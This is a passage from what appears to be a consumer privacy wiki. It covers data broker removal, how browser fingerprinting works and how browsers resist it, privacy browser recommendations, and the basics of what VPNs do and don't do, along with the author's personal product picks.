doesn't solve this completely. If your home address lives in county property records, no opt-out removes it from the underlying public record, it only asks sites not to surface it. The removal process requires ongoing maintenance, not a single session. --- ## 💡 Common Misconceptions ### "Once I remove myself, I'm done." This leads people to do a one-time sweep and then ignore the category for years. Removal is reactive, not preventative. Your home address lives in county property records. Your name appears in voter rolls. The next time a broker re-scrapes those public sources, you're back on the list. A site you successfully removed from in January will often have a fresh listing by July. Sustainable protection requires both ongoing removal *and* upstream prevention...using a [PO box or registered agent for public records](https://www.consumerreports.org/electronics/personal-information/how-to-delete-your-information-from-people-search-sites-a6926856917/) where possible, aliasing your email at signup, declining loyalty programs that resell purchase data, and other strategies shared in this wiki. ### "The manual route is the only legitimate approach." Manual opt-outs are free, give you direct control, and can be extremely impactful. However, I've worked with enough clients over the years to confidently say that few people sustain the manual process indefinitely. The work compounds, the broker list keeps growing, and one missed cycle puts you back where you started. For the vast majority of people, a $20-a-year automation service is a sustainable alternative. The manual route remains useful for users who want full control, for residents of jurisdictions where automation services don't operate well, and as a one-time deep clean before handing the ongoing work to a service. --- ## 🗣️ Henry's Take Two things have to be true at the same time for data broker work to actually matter: you have to remove what's already out there, and you have to stop adding to it. Most people pick one and call it done. The ones who only opt out end up doing the same removals every year as new public records get scraped. The ones who only practice prevention going forward leave existing exposure in place. Both halves of the job need to happen. On the question of *how* to do the removal: the community often pushes the manual route as the principled answer. While I agree it works, I've also worked with dozens of clients on this over the years, and almost all of them eventually learned the hard way that doing it manually isn't sustainable. The opt-out forms are buried by design, the process varies by site, and the upkeep is recurring forever. I'm a fan of saving the manual work for the highest-impact sites, and instead putting time into prevention. The political dimension is also important to follow. The only reason tools like California's [DROP](https://privacy.ca.gov/drop/) exist (a centralized submission that triggers deletion across all registered brokers) is from legal pressure. That model has to go federal for the broker industry to be brought under meaningful control. If this issue matters to you, talking to your representatives about federal data broker legislation is, over the long run, more leveraged than any individual opt-out cycle. [Politicians are impacted by this as well, with their lives on the line.](https://www.startribune.com/local-lawmakers-worry-about-their-safety-after-shooter-visited-people-search-sites-to-find-victims/601374743) Something else I'm watching: a small but real trend toward local-first opt-out automation, where the deletion work happens on your own device without your personal information being sent to a third-party service. [Redact.dev](https://redact.dev) has been working in this direction, and DuckDuckGo's browser ships a local removal tool that runs on your desktop without sending your data anywhere (it's part of their paid Privacy Pro subscription). I haven't tested these enough to recommend them as primary options yet, but the direction is interesting and I expect this space to mature meaningfully over the next year as people chase automated opt-outs without needing to trust a third-party company. --- ## ✅ Henry's Picks [**EasyOptOuts**](https://easyoptouts.com): This is what I currently use. Roughly $20 per year, one-time signup, then the service runs ongoing removal cycles across the broker sites that matter most. Nearly tied with Optery for effectiveness in the Consumer Reports research, but for a much smaller price tag. [**Optery**](https://www.optery.com): worth knowing for two reasons. First, its free plan is one of the best discovery tools available, since it scans the broker landscape and gives you an exposure report with screenshots showing exactly where your information is listed. Second, if you do want a full-service paid option, Optery ranked the single most effective service in the [Consumer Reports study](https://www.consumerreports.org/electronics/personal-information/services-that-delete-data-from-people-search-sites-review-a2705843415/) (68% removal at four months, narrowly ahead of EasyOptOuts), and its paid tiers cover the widest broker list of anything tested. The catch is price: the top tier runs $249/year. For most people EasyOptOuts is the better value, but Optery's free exposure scan is useful to everyone regardless of which removal route you choose. [**Big Ass Data Broker Opt-Out List**](https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-List): the reference for anyone doing this manually or doing a one-time deep clean before switching to an automation service. Maintained, comprehensive, organized by priority. Free. [**California DROP**](https://privacy.ca.gov/drop/): for California residents, a centralized state-run opt-out that registered brokers are legally required to honor, beginning August 1, 2026\. Worth evaluating once the platform has been live long enough to assess real-world enforcement. The political case for federal equivalents is strong, and California's model is what the federal version would likely be built around. **Watch this trend:** local-first opt-out automation. [Redact.dev](https://redact.dev) and DuckDuckGo's browser-integrated removal tool (part of its paid Privacy Pro subscription) both do the deletion work on your device without sending your personal information to a third-party service. Promising direction, but I haven't validated either enough to recommend as a primary option yet. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### What Is Browser Fingerprinting and How Do You Stop It? URL: https://techlore.tech/what-is-browser-fingerprinting-and-how-do-you-stop-it/ Last updated: 2026-07-19T01:56:51.000Z ## 📖 The Basics ### What It Is Browser fingerprinting is a tracking technique that identifies your browser and other devices by collecting a set of characteristics about your system and combining them into a unique identifier. Unlike cookies, it stores nothing on your device. There's nothing to clear, nothing to block at the storage level, and no indication visible to you that it's happening. The technique works because the combination of ordinary, individually unremarkable attributes like your screen resolution, your time zone, your installed fonts, the way your graphics hardware renders a specific shape, and many other inherent attributes of your device(s) produces a profile that is statistically unique to your device. You can delete every cookie in your browser, open a private window, and block every known tracker, and a fingerprinting script can still identify you the moment a page loads. ### How It Works When your browser loads a page, JavaScript running on that page can query your browser about your system. The process is passive, invisible, and requires no permission from you. #### Some Attributes That Make Up a Fingerprint - *Canvas fingerprinting*: a script draws an invisible image in an off-screen canvas element and reads back the pixel data. Because the image is rendered by your specific combination of graphics hardware, drivers, and operating system, the output differs subtly between devices. This is one of the most determinative signals. - *WebGL fingerprinting*: similar to canvas, but using 3D rendering. The GPU model and driver version produce characteristic variations in how scenes are rendered, even when the input is identical. - *Audio context fingerprinting*: measures how your system processes audio through the browser's Web Audio API. Hardware and OS differences produce measurable variation in the output waveform. - *Installed fonts*: your browser can be queried about which fonts are available on your system. The specific set of fonts can differ meaningfully between users. - *User agent string*: sent automatically with every browser request. Contains your browser name, version, and operating system. Readable by any server you connect to without any JavaScript needed. - *Screen resolution and color depth, time zone, language settings, browser plugins and extensions*: each when combined can narrow the population of matching browsers dramatically. - *Behavioral signals*: fingerprinting can extend beyond static attributes to include typing patterns, mouse movement dynamics, and interaction timing. These behavioral biometrics are harder to spoof and can achieve high identification accuracy even when static signals are partially randomized. Combined, these signals can make browsers unique or near-unique. Early large-scale studies like the EFF's [Panopticlick research](https://coveryourtracks.eff.org/static/browser-uniqueness.pdf) (Eckersley, 2010) found 83.6–94.2% of fingerprints were unique across nearly half a million browsers; more sophisticated techniques using OS and hardware-level signals have achieved [up to 99% uniqueness](https://www.ndss-symposium.org/wp-content/uploads/2017/09/ndss2017%5F02B-3%5FCao%5Fpaper.pdf) in research settings (Cao et al., NDSS 2017). The exact figure varies by method, but the practical conclusion is consistent: for most browsers with no active mitigation, the fingerprint is unique or near-unique. And this form of tracking is widespread. A [2016 Princeton study](https://webtransparency.cs.princeton.edu/webcensus/) (Englehardt & Narayanan) crawled the Alexa top 1 million sites and found canvas fingerprinting running on over 14,000 of them...not just on the sketchy edges of the web, but across mainstream retail sites, news sites, and the ad networks embedded throughout them. Those scripts don't have to be deployed directly by every site: a single third-party analytics or advertising service with fingerprinting baked in can appear across thousands of sites simultaneously. The technique moved from "interesting research finding" to "default surveillance infrastructure" years ago. Browser vendors and regulators have started pushing back, but the baseline expectation is that many sites you visit are running some form of fingerprinting, directly or through an embedded third party. #### Test Your Own Fingerprint These tools let you see what your browser is actually exposing, each with a different focus. None of these directly translate to how possible it is for a malicious site to fingerprint you, but they are educational tools to help you see what each of your browsers can expose to sites. - [**Cover Your Tracks**](https://coveryourtracks.eff.org) (EFF): a solid starting point. Runs real fingerprinting techniques against your browser and gives a clear verdict on how protected you are. Tests tracker blocking, fingerprinting resistance, and shows how your browser appears to the tracking ecosystem. Run it before and after switching browsers, the difference is concrete and measurable. - [**AmIUnique**](https://amiunique.org): focuses specifically on *uniqueness*. It compares your fingerprint against a large pool of collected fingerprints to show how identifiable you are within the broader population. Good complement to Cover Your Tracks. - [**BrowserLeaks**](https://browserleaks.com): a technically detailed option. Breaks down each fingerprinting surface individually like canvas, WebGL, audio, fonts, WebRTC, IP leaks, and more, so you can see exactly what each API is exposing. Useful if you want to dig into specific signals. - [**CreepJS**](https://abrahamjuliot.github.io/creepjs/): open-source and research-oriented. Shows how modern fingerprinting scripts actually work by running the same detection techniques attackers use, then displaying the raw results. #### How Browsers Try To Beat Fingerprinting No single mitigation stops fingerprinting entirely...but layered together, these four strategies meaningfully raise the cost of tracking you. - *Blocking known fingerprinting scripts*: Tools like [uBlock Origin](https://ublockorigin.com), [Brave Shields](https://brave.com/privacy-features/), and/or [Firefox's Enhanced Tracking Protection](https://support.mozilla.org/en-US/kb/firefox-protection-against-fingerprinting) (in Strict mode) block scripts from known fingerprinting vendors before they ever run. This is highly effective against cross-site fingerprinting infrastructure. A single blocked library can prevent your fingerprint from being collected across dozens of sites at once. It doesn't stop first-party fingerprinting, where a site runs the fingerprinting logic itself without a third-party script, but it removes a large class of reusable tracking infrastructure that makes tracking possible. - *Coarsening and normalizing signals*: Rather than blocking fingerprinting outright, some browsers reduce the precision of what they expose. [Firefox in Strict mode and Private Browsing](https://blog.mozilla.org/en/firefox/fingerprinting-protections/) adds noise when sites read back canvas data, limits font exposure to standard OS-bundled fonts instead of your full installed set, and coarsens hardware signals like CPU core count and screen dimensions. [Safari's fingerprinting protection](https://webkit.org/tracking-prevention/) takes a similar approach. These protections make your fingerprint less distinctive without breaking most sites, since the data is still served, just with reduced entropy. - *Uniformity (*[*Tor Browser*](https://www.torproject.org/)*,* [*Mullvad Browser*](https://mullvad.net/en/browser)*)*: standardize as many fingerprinting signals as possible across all users of the same browser. If every Tor Browser user presents the same canvas output, the same font set, the same user agent, then fingerprinting can't distinguish between them. This is the strongest theoretical approach, but comes with usability sacrifices. - *Randomization (*[*Brave*](https://brave.com/)*)*: change fingerprinting signals each session so they can't be used reliably for tracking across sessions or sites. Your canvas output this session differs from your canvas output next session. This is effective against passive, large-scale fingerprinting operations that rely on a stable identifier, and has far less friction than the uniformity approach for everyday use. Script blocking is a strong baseline for almost everyone. Signal coarsening (Firefox Strict, Safari) adds a meaningful layer on top at low cost. Uniformity (Tor Browser) provides the strongest protection against sophisticated adversaries but customizing the browser at all undermines it. Randomization (Brave) is a nice middle ground for users who want active resistance against commercial tracking without overhauling how they browse. These aren't mutually exclusive, the strongest setups layer multiple strategies. #### On "Anti-Fingerprinting" Extensions Extensions that claim to block fingerprinting can often make things worse. An extension that injects custom values into canvas or WebGL queries, blocks specific APIs, or randomizes signals may create a fingerprint pattern that's more unique than the default, since now your browser looks like the small population of people running that specific extension with those specific settings. Generally, browser-level mitigations work better than extension-level ones because the browser controls the base signals and can coordinate across them. Extensions see only part of the picture. --- ## 🎯 Why It Matters Everyone should test this themselves. Open your current browser, go to [**coveryourtracks.eff.org**](https://coveryourtracks.eff.org) and run the test. If you're using a typical browser, you'll very likely see that your browser is "unique" or "nearly unique" against the population of tested browsers. Now consider what that fingerprint accumulates over time. Every site that runs fingerprinting tools can correlate your visits without any login or cookies, even in incognito windows. You browse an article about a health condition on one site. You look at a medication on another. You research something financial on a third. None of these required a login. You cleared your cookies between sessions. From the perspective of a tracking network with fingerprinting deployed across all three, it was the same person each time. The implications scale with your threat model. For most people, the consequence is persistent ad targeting that follows you across sites in ways you didn't agree to and can't easily see. For journalists, activists, or anyone who needs their browsing to be unassociated across sites, fingerprinting is a meaningful surveillance vector that requires a deliberate response. The honest answer on mitigation is that it requires accepting some tradeoffs. Tor Browser provides the strongest protection but the most friction. Brave's randomization approach provides decent protection against commercial tracking with far less disruption to everyday use. The worst outcome is assuming that clearing cookies, only using a tracker blocker, or using incognito mode has handled it, when in reality those measures don't touch fingerprinting at all. --- ## 💡 Common Misconceptions ### "Google Chrome is more private than a privacy browser, because privacy tools make me more unique." This is a prevalent (and dangerous!) misconception, which can push people toward exactly the wrong choice. The reasoning has a kernel of truth...adding signals can make you more identifiable, but the conclusion is wrong because it assumes that not customizing your browser means there are no signals to identify you. Even when you do nothing, your device still produces a unique canvas fingerprint, a unique WebGL fingerprint, an audio context fingerprint, a font list, a user agent, a list of installed extensions, behavioral signals from how you type and move the mouse, and more. Chrome will do nearly nothing to prevent those signals from leaking to each site you access. Resisting fingerprinting is an *active* property of a browser, not the absence of customization. Browsers that actually resist fingerprinting—Brave, Firefox, Safari, Mullvad Browser, or Tor Browser—are all better at this than stock Chrome on every meaningful axis. The "blending in by doing nothing" intuition is almost always wrong. This is a natural place to introduce an important lesson: **the lack of doing something bad is not the same as the act of doing something good.** A browser that doesn't ship invasive telemetry, doesn't sell your data, and doesn't actively betray you is privacy-*respecting*...that's the lack of doing something bad. A browser that *also* takes active steps to randomize or normalize your identifiable signals across sites is privacy-*focused*...that's the act of doing something good. Both properties matter, but anti-fingerprinting falls mostly in the second category. ### "Fingerprinting is too hard to defend against, so there's no point trying." This leaves a lot of protection on the table. Most people are not the target of motivated fingerprinting operations. What they actually face is the commercial tracking ecosystem which is large-scale, automated, and passive. That ecosystem can be meaningfully beat by an ad & tracker blocker and a browser that does any form of active resistance. You don't need perfect anonymity to make the tracking ecosystem less effective at building a profile of you. Brave's randomization, Firefox or Safari with fingerprint resistance, or Mullvad Browser's uniformity gets users most of the benefits. ### "A browser that blocks trackers is the same as an anti-fingerprinting browser." It isn't. Tracker blocking stops third-party scripts from loading, which prevents a large category of third-party fingerprinting. But it does not address *first-party* fingerprinting, where the site you're actually visiting is running fingerprinting code itself—[2025 research from Zhang et al.](https://arxiv.org/html/2409.15656v2) found that sites actively use first-party fingerprinting for ad targeting and cross-session tracking even when users have attempted to opt out. A genuinely anti-fingerprinting browser also takes [active steps to obscure or randomize the underlying signals](https://blog.mozilla.org/en/firefox/fingerprinting-protections/) that make first-party fingerprinting possible, like signal-level defenses that [tracker blockers alone cannot provide](https://support.mozilla.org/en-US/kb/firefox-protection-against-fingerprinting). If a browser is doing only the first half, calling it anti-fingerprinting is a marketing claim that the architecture doesn't back up. --- ## 🗣️ Henry's Take The single most important thing to take away from this category is that the "stock browser is more anonymous" argument is wrong, and acting on it pushes people toward exactly the wrong browser. Chrome is not anonymous. Stock Chrome with the default configuration still generates every signal a fingerprinting script could ask for. The realistic answer for almost everyone is to combine a browser that does active fingerprinting resistance with a tracker and ad blocker that prevents most of the scripts from running in the first place. That combination: Brave with Shields, Firefox with uBlock Origin, Mullvad Browser, Tor Browser, etc. can all battle this fingerprinting problem without requiring a different lifestyle. The friction is low, and most users will never notice the protection working for them. I use Brave as my default browser. Mullvad Browser is my pick when uniformity-based resistance is the better fit...things like research that doesn't need to be linkable to my identity, account-free browsing, anything where standing out is the actual threat. Tor Browser is what I reach for when network-level anonymity is also part of the requirement. None of these are the universal answer; they're tools for slightly different jobs, and I install multiple browsers for exactly this reason. If you take one thing from this article, take this: don't downgrade to a browser you think is "safer because it does less." That move is louder than the customization it's trying to avoid. --- ## ✅ Henry's Picks [**Brave**](https://brave.com): randomization-based fingerprinting resistance enabled by default through Brave Shields, paired with native tracker and ad blocking. A low-friction option for users who want meaningful protection against the commercial tracking ecosystem without adopting a different browsing lifestyle. My default. [**Mullvad Browser**](https://mullvad.net/en/browser): uniformity-based resistance built on the same approach as Tor Browser, but connecting to the regular internet. Designed to pair with a VPN. Ephemeral by design (clears all data on close). Higher friction than Brave: more CAPTCHAs, more site compatibility quirks in exchange for stronger anti-fingerprinting properties. The right pick when standing out is the threat you're actually worried about. I use this with Mullvad VPN which is what they suggest. [**Tor Browser**](https://www.torproject.org): the strongest fingerprinting resistance available in a mainstream browser, layered on top of network-level anonymity via the Tor network. Slower, with more compatibility tradeoffs, but covered in depth in Understanding Tor for the situations where it's the right tool. **Pair any of these with an ad and tracker blocker.** [uBlock Origin](https://ublockorigin.com) on Firefox, Brave Shields by default on Brave, and Mullvad Browser's built-in blocking by default all do this. Browser + blocker is the combination that handles most of what most people face. Ghostery and AdGuard are two other great, open-source extensions for something more approachable. **Test your own fingerprint.** [Cover Your Tracks](https://coveryourtracks.eff.org) (EFF) and [AmIUnique](https://amiunique.org) both let you see what your current browser is exposing. Worth running once before you switch and once after: the difference is concrete. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Best Browsers for Privacy: What to Use and How to Configure It URL: https://techlore.tech/best-browsers-for-privacy-what-to-use-and-how-to-configure-it/ Last updated: 2026-07-19T01:44:40.000Z ## 📖 The Basics ### What It Is A web browser is the software that controls your entire relationship with the internet. It loads pages, runs scripts, handles your passwords and cookies and form data, and decides which tracking code to execute and which to block. Every website you visit, every form you fill out, every video you watch passes through it. Browser choice determines what data you leak by default, what tools are available to you, and how much configuration is required to reach a reasonable privacy baseline. ### How It Works #### What Browsers Actually Collect The browser itself, separate from any website you visit, can transmit data back to its developers. Telemetry: usage statistics, crash reports, feature adoption, behavioral patterns. This data goes to whoever built the browser. Chrome sends it to Google. Edge sends it to Microsoft. Firefox sends it to Mozilla. The amount and sensitivity varies considerably, and so does whether it's opt-in or opt-out. For example, the telemetry Firefox collects isn't as invasive as what Microsoft or Google collects. The browser is also distinct from the search engine, which are often conflated. You can use Firefox with Google search, Chrome with DuckDuckGo, Brave with any search engine you choose. The browser handles how you access the web, the search engine handles what you look for. #### What "Privacy-Respecting" Means For a Browser A privacy-respecting browser minimizes its own data collection (low or zero telemetry), blocks third-party tracking scripts by default rather than requiring an extension to do it, provides meaningful fingerprinting resistance, and doesn't have a business model that depends on your browsing behavior. These properties aren't all-or-nothing—they exist on a spectrum across different browsers that we'll discuss later in the article. #### Extensions and Why Manifest V3 Matters Browser extensions like uBlock Origin have historically been a highly effective tool for blocking ads and trackers. This is changing significantly in Chromium-based browsers due to Google's Manifest V3 (MV3) transition. Chrome's extension architecture was rebuilt under MV3 with new restrictions on what extensions can do. The old framework (MV2) allowed extensions like [uBlock Origin](https://ublockorigin.com) to dynamically intercept and filter network requests. MV3 replaced this with a more limited declarativeNetRequest API where extensions declare a capped set of static rules in advance. [Google completed the MV2 phase-out](https://developer.chrome.com/docs/extensions/develop/migrate/mv2-deprecation-timeline) so uBlock Origin in its original form no longer functions in Chrome. A "Lite" version exists but has substantially reduced blocking capability. It's worth being direct here: the company that made this architectural decision (Google) earns the majority of its revenue from advertising. Firefox retains full webRequest API compatibility, uBlock Origin works on Firefox exactly as intended. Brave, as an independent Chromium fork, has maintained its own extended MV2 support and ships with native ad blocking (Shields) that doesn't depend on the extension API restrictions at all and still allows users to use uBlock Origin. #### The Major Browsers Evaluated - [*Firefox*](https://www.mozilla.org/firefox/): open source, built by Mozilla. Retains full support for powerful extensions including uBlock Origin. Strong Enhanced Tracking Protection built in. Ships at a moderate default for broad compatibility, which means getting the most out of it requires some configuration. The most extensible privacy-focused mainstream browser available. Works on all platforms including Android, where it's one of the few mobile browsers that supports the full extension ecosystem. - [*Brave*](https://brave.com): built on Chromium but with privacy modifications throughout. Ships with Shields enabled by default: built-in tracker and ad blocking, fingerprinting resistance, and more. Has maintained MV2 extension support independently of Google's Chromium deprecation. For most everyday users who want strong privacy with minimal configuration, Brave's defaults are a fast path to a meaningfully more private browsing experience. - [*LibreWolf*](https://librewolf.net): a hardened fork of Firefox. Where Firefox ships conservatively on privacy settings for compatibility reasons, LibreWolf ships with those settings pre-configured toward privacy: telemetry disabled, stronger tracking protection active, fingerprinting resistance enabled. Reduces the configuration burden for users who want Firefox's architecture with fewer initial setup steps. - [*Mullvad Browser*](https://mullvad.net/en/browser): built by Mullvad VPN in [collaboration with the Tor Project](https://blog.torproject.org/releasing-mullvad-browser/). Uses Tor Browser's approach to fingerprinting resistance (making all users' browsers appear as similar as possible) but connects to the regular internet rather than Tor. Designed to pair with a VPN. Ephemeral by design, so it clears all data on close. More likely to trigger CAPTCHAs and site compatibility issues. For users prioritizing anti-fingerprinting above all else. - [*Tor Browser*](https://www.torproject.org): routes all traffic through the Tor network. Provides the strongest anonymity available in a mainstream browser. Substantially slower than all alternatives. Covered in depth in the Understanding Tor article. - [*Safari*](https://www.apple.com/safari/): Apple's browser, using the independent WebKit engine. Has meaningful built-in tracking protection (Intelligent Tracking Prevention). A reasonable default for users in the Apple ecosystem who don't want to change platforms. Limited extension ecosystem compared to Firefox and Chromium-based browsers. - [*Chrome*](https://www.google.com/chrome/) *and* [*Edge*](https://www.microsoft.com/edge): Chrome is built by Google, Edge by Microsoft. Both carry significant telemetry and are not recommended for users with meaningful privacy goals. Chrome's MV3 transition actively reduced the effectiveness of third-party privacy tools. Chrome's tight Google account integration, usage telemetry, and advertising-aligned architectural decisions make it a poor choice for privacy. Edge is similar. #### Hardening Firefox Firefox ships at moderate defaults to stay compatible with the broadest possible range of websites. For users who want to go further than Firefox's defaults, manual hardening is the next level. The primary tool for this is [**arkenfox user.js**](https://github.com/arkenfox/user.js): a community-maintained `user.js` configuration file that overrides hundreds of Firefox's default preferences toward stronger privacy and security. It covers areas like disabling telemetry, strengthening tracking protection, reducing fingerprinting surface, enforcing HTTPS, and hardening various internal APIs. It's well-documented and actively maintained, with each setting explained so you can understand and adjust what you're changing. The tradeoff with aggressive hardening is some settings will break specific sites, and maintaining the configuration requires occasional attention as Firefox updates. Arkenfox is aimed at users who want to understand what each change does rather than just applying a preset, it's a hands-on approach. For most users, starting with Firefox + uBlock Origin covers the majority of practical privacy gains. Arkenfox is great for users who want to go deeper without switching browsers entirely. Nowadays, many hardening advantages can be achieved with a fork like Mullvad Browser or LibreWolf. A dedicated wiki article on Firefox hardening is planned. #### A Note on Mobile On Android, Firefox is one of the very few mobile browsers that supports the full extension ecosystem, including uBlock Origin, making it unusually powerful for mobile privacy. Brave for Android provides strong native blocking without needing extensions. On iOS, Apple's WebKit requirement means all browsers use the same rendering engine as Safari underneath; the differences come from privacy features layered on top. Brave and Firefox for iOS both add meaningful tracker protection above Safari's baseline. There's a security tradeoff on Android worth knowing about. Firefox (Gecko-based) does not use Android's `isolatedProcess` API for its renderer processes, which means its per-process sandboxing is weaker than Chromium-based browsers. Brave, Chrome, and other Chromium browsers on Android do use `isolatedProcess`, giving each renderer stronger isolation from the rest of the system. For most users, this tradeoff is acceptable since Firefox's extension ecosystem (especially uBlock Origin) delivers significant real-world protection, but it's a limitation to understand. --- ## 🎯 Why It Matters In [June 2024, Google began phasing out Manifest V2 support in Chrome](https://blog.google/chromium/manifest-v2-phase-out-begins/). For the tens of millions of people using uBlock Origin this meant the original extension no longer worked at all in Chrome. The replacement framework blocks fewer trackers, allows fewer dynamic rules, and is measurably less effective at the task the extension was built to do. This decision was made by a company that earned the overwhelming majority of its revenue from advertising. The extension architecture that limited what ad blockers could do was the architecture they chose to enforce. Firefox and Brave both maintained full extension capabilities. The browser choice you make determines what tools are available to you, and who benefits from the architecture you're operating inside. Switching browsers costs nothing and takes minutes. The alternatives discussed in this article reduce or eliminate the data collection that makes Chrome and Edge poor choices, and provide meaningful tracker blocking that the default browsers don't, often by default. --- ## 💡 Common Misconceptions ### "I need to find the one perfect browser that does everything." Most everyday users are looking for a single browser they can commit to forever. The honest answer is that no browser is best at everything. A workable real-world setup is one strong default (the browser where 95% of your time happens) plus one or two specialized browsers for edge cases. Like maybe a fingerprinting-resistant browser for sensitive research, Tor Browser for anonymity, and yes, sometimes a stock browser kept around purely for compatibility testing. Using multiple browsers is actually using the right tool for each job. ### "A fork that doesn't collect telemetry is automatically a privacy browser." It's privacy-respecting, which is a real and valuable property, but it's not the same thing as a privacy-focused browser. A fork that strips Mozilla or Apple telemetry isn't doing anything bad, but if it's not also adding active fingerprinting resistance, tracker blocking, and the other protections that define a true privacy browser, it sits in a different category than [Mullvad Browser](https://mullvad.net/en/browser) or [Tor Browser](https://www.torproject.org). This is the distinction between *the lack of doing something bad* and *the act of doing something good*—both matter, but they're different properties. The Browser Fingerprinting article works through this distinction in more depth. ### "Chrome should never be installed on a privacy-conscious person's computer." Chrome is the default reference implementation of Chromium and has the broadest site compatibility on the web. Keeping it installed for development work, for testing whether a site is broken in your default browser, or for the rare site that genuinely will not work in anything else, is a perfectly reasonable tradeoff. The thing to avoid is making Chrome your default and the place you do the rest of your browsing. There's also one genuinely legitimate security argument for Chrome: Chromium has the strongest browser sandboxing model available, and Google patches zero-days faster than almost anyone else. If your threat model prioritizes security over privacy (defending against zero-day exploits rather than preventing tracking), Chrome is defensible on those grounds alone. For users who want the Chromium security model *without* Google's data collection, Brave inherits the same sandboxing and nearly keeps pace with Chromium's security patches while removing the privacy-hostile defaults. --- ## 🗣️ Henry's Take I run more than five browsers across my daily machines. Brave is the default, where most of the browsing happens. Mullvad Browser handles anti-fingerprinting work. Tor Browser stays installed for anonymity-sensitive tasks. Firefox stays installed because its extension ecosystem on Android is uniquely powerful, and Chrome stays installed for the troubleshooting and compatibility cases that genuinely require it. 95% of my actual time lives in Brave and Mullvad, the rest are there because the cost of keeping them installed for edge cases is practically zero, and the payoff when one of them is exactly the right tool is real. I believe the single highest-leverage move for most people coming from Chrome or Edge is switching to Brave. It's a Chromium-based browser, so the muscle memory transfers immediately for features like extensions, sync, UI patterns, etc. It ships with tracker and ad blocking enabled by default (including on YouTube, RIP our ad revenue), maintains independent extension support through the Manifest V3 transition, and provides a measurably better baseline than stock Chrome with no configuration. Firefox is also a great choice if you don't care about the Chromium-feels-like-Chrome migration path. Generally, I put less emphasis on browser-rank arguments, because the gap between Chrome/Edge and *any* of the browsers I'd recommend is far larger than the gap between the recommended options themselves. Moving away from Chrome and Edge is the move that matters. Which alternative you land on depends on the specifics of what you're using it for. So just pick your favorite. Where I see the technical privacy conversation getting lost is in browser comparisons that omit things that matter to users. Sandboxing is real and matters, but so is having a working ad blocker. A browser that has best-in-class security features but can't run a proper ad blocker is making a tradeoff—just as the inverse situation is also making a tradeoff. The honest answer is that both properties matter and the best choice depends on which threats are more relevant to you. And the real solution is probably to use *both* browsers for different purposes. --- ## ✅ Henry's Picks [**Brave**](https://brave.com): my day-to-day default. Strong out-of-the-box experience for users coming from Chrome. Ad and tracker blocking enabled by default, fingerprinting resistance through randomization, MV2 extension support maintained, native YouTube ad blocking. [**Firefox**](https://www.mozilla.org/firefox/): the right pick when extension flexibility matters most, and the only major Android browser with full uBlock Origin support. Ships at moderate defaults for compatibility, so getting the most out of it benefits from some setup. [**Mullvad Browser**](https://mullvad.net/en/browser): built by Mullvad with the Tor Project. Tor Browser's uniformity-based fingerprinting resistance, but connected to the regular internet. Designed to pair with a VPN. Useful as a secondary browser for research, account-free browsing, or any context where standing out is the threat. Note it ignores system-level DNS configuration by default, which can be handy as a DNS troubleshooting tool. [**Tor Browser**](https://www.torproject.org): for situations where network-level anonymity is the requirement. Covered in depth in Understanding Tor. **Mobile**: [Brave](https://brave.com) on iOS and Android for the same reasons as desktop. [Firefox for Android](https://www.mozilla.org/firefox/browsers/mobile/android/) is the rare mobile browser that supports full uBlock Origin and the broader extension ecosystem, which is a meaningful advantage if you want desktop-class blocking on your phone. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### VPNs: What They Do and What They Don't URL: https://techlore.tech/vpns-what-they-do-and-what-they-dont/ Last updated: 2026-07-19T01:43:18.000Z ## 📖 The Basics ### What It Is A Virtual Private Network (VPN) creates an encrypted tunnel between your device and a server operated by the VPN provider. All your internet traffic travels through that tunnel before reaching its destination. From your ISP's perspective, they see that you're connected to a VPN server and nothing else. From the perspective of the website you're visiting, they see the VPN server's IP address, not yours. That's it. That's the mechanism. The marketing around VPNs routinely inflates this into something much broader like "total online anonymity," "military-grade protection," "complete privacy." The reality is far simpler: a VPN is a specific tool for a specific job, and understanding exactly what job that is determines whether it's actually useful for your situation. #### What a VPN Does When you connect to a VPN, your device encrypts all outgoing traffic before it leaves. That encrypted traffic travels to the VPN provider's server, which decrypts it and forwards it to its destination. The practical effects: - Your ISP can't see your traffic content. They can see that you've connected to a VPN server. They cannot see which sites you're visiting or what you're doing there. For people whose ISP actively monitors, throttles, or logs their activity, this is a meaningful privacy improvement. - Websites see the VPN server's IP, not yours. Sites that track IP addresses for targeting, geo-restriction, or identification see the VPN's address. Your real IP isn't logged by the destination. This is also a meaningful privacy improvement. - Traffic on untrusted networks is encrypted. On a coffee shop Wi-Fi, hotel network, or airport hotspot, your traffic passes through infrastructure you don't control and don't know who operates. A VPN encrypts everything before it hits that network, which protects against passive interception on the local network. While this *can* be a security benefit, it's becoming less useful as most websites now encrypt using HTTPS, which makes this a far smaller concern than it used to be. #### What a VPN Does Not Do - It does not make you anonymous. The VPN provider itself sees your real IP address. While many privacy-focused VPN providers implement safeguards like no-logging policies, your VPN is always a shift of trust from your ISP to your VPN provider. - It does not protect you from all tracking mechanisms. Cookies, browser fingerprinting, login sessions, tracking pixels...none of these are affected by a VPN. Hiding your IP address is one of many ways you can be tracked online. - It does not encrypt traffic that wasn't already encrypted. HTTPS protects the content of web connections; a VPN adds a layer around the outside. If a site doesn't use HTTPS (rare now but not extinct), a VPN doesn't fix it. - It does not protect against malware, phishing, or on-device threats. Some VPNs offer DNS-level blocking of known malicious domains, which catches some threats, but this is a secondary feature. #### The VPN Tunnel Explained Modern VPNs run on [**WireGuard**](https://www.wireguard.com), which has become the new VPN standard. WireGuard has a small, auditable codebase, performs faster than older protocols like OpenVPN, and has a strong security track record. As of 2026, leading providers are adding post-quantum encryption (PQE) to WireGuard implementations to protect against future quantum computing threats. #### Key VPN Features Explained - *Kill switch*: automatically blocks all internet traffic if the VPN connection drops, preventing your real IP from leaking during disconnects. Non-negotiable for mission-critical tasks. - *DNS leak protection*: ensures your DNS queries route through the VPN tunnel rather than directly to your ISP's DNS servers. Without this, your ISP still sees the domains you're visiting even while your other traffic is tunneled. - *No-logs policy, independently audited*: VPN providers routinely claim they don't log user activity. Claims without third-party verification from named auditors reviewing actual server infrastructure are marketing, not evidence. Look for published audit reports and regular re-audits. These are meaningful trust signals. #### A Note On Free VPNs Operating a VPN requires real infrastructure. If there's no subscription revenue, something else is paying the bills. The documented patterns with standalone free VPNs include logging and selling user traffic, injecting ads into browsing sessions, and using your device as an exit node for other people's traffic. There are exceptions: free tiers of reputable paid providers are meaningfully different. These exist as limited versions of verified products, not as revenue schemes built around user data. The point isn't that *all* free VPNs are a problem, but 